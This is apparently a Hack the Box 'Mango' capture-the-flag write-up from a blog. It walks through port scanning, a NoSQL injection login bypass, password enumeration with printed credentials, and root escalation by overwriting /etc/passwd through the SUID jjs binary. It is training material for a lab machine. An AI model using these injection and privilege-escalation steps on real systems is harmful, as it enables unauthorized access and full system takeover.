Hack the Box: Mango

Mango

User

nmap -sS -sV -n -p- mango.htb-- snip --PORT    STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# openssl s_client -showcerts -connect mango.htb:443
CONNECTED(00000003)
depth=0 C = IN, ST = None, L = None, O = Mango Prv Ltd., OU = None, CN = staging-order.mango.htb, emailAddress = admin@mango.htb
-- snip --
Mango login page
username[$ne]=test&password[$ne]=test&login=login
Logged in to staging-order
# python mango-enum-users.py 
admin
mango
# python mango-enum-password.py -u admin
t9KcS3>!0B#2
# python mango-enum-password.py -u mango
h3mXK8RhU~f{]f5H
# ssh mango@mango.htb
-- snip --
Password: h3mXK8RhU~f{]f5H
mango@mango:~$ su admin
Password: t9KcS3>!0B#2

$ cd /home/admin
$ cat user.txt
79b...

Root

$ find / -perm /4000 2>/dev/null
-- snip --
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
-- snip --
openssl passwd -1 -salt tellico test123
$1$tellico$30TQ5Bff7wtirtpxbOqmR/
$ cd /tmp
$ cp /etc/passwd .
$ echo "tellico:\$1\$tellico$30TQ5Bff7wtirtpxbOqmR/:0:0::/root:/bin/bash" >> passwd
$ echo "Java.type('java.lang.Runtime').getRuntime().exec('cp passwd /etc/passwd').waitFor()" | jjs
$ su tellico
Password: test123
root@mango:/home/admin/tellico# cd /root
root@mango:~# cat root.txt
8a8...

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Remote & Local Port Tunneling

{UPDATE} Tinkerball Hack Free Resources Generator

{UPDATE} Hidden Objects Hack Free Resources Generator

Best Free Firewalls for Windows to Protect Your Computer from Cyberattacks

Launch the META-AIRLINE HomePage

Cyber Security (Better Than Musk)

Privacy Policy

Satellite cyberattacks, Russian disinformation and ContiLeaks fallout

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tellico Lungrevink

Tellico Lungrevink

More from Medium

Network Services (Telnet) — Tryhackme

Bounty-Hunter-HTB-Writeup

TryHackMe | Skynet Write up

Basic Pentesting CTF Walkthrough